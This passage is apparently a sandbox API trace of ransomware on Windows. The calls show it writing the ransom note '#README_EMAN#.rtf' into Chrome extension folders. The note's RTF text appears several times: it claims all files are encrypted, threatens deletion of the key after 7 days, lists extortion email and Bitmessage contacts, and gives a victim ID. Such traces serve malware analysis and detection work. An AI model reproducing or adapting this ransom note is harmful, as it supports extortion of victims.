in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.756] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.757] CloseHandle (hObject=0x294) returned 1 [0297.757] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0297.757] GetLastError () returned 0x2 [0297.757] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link 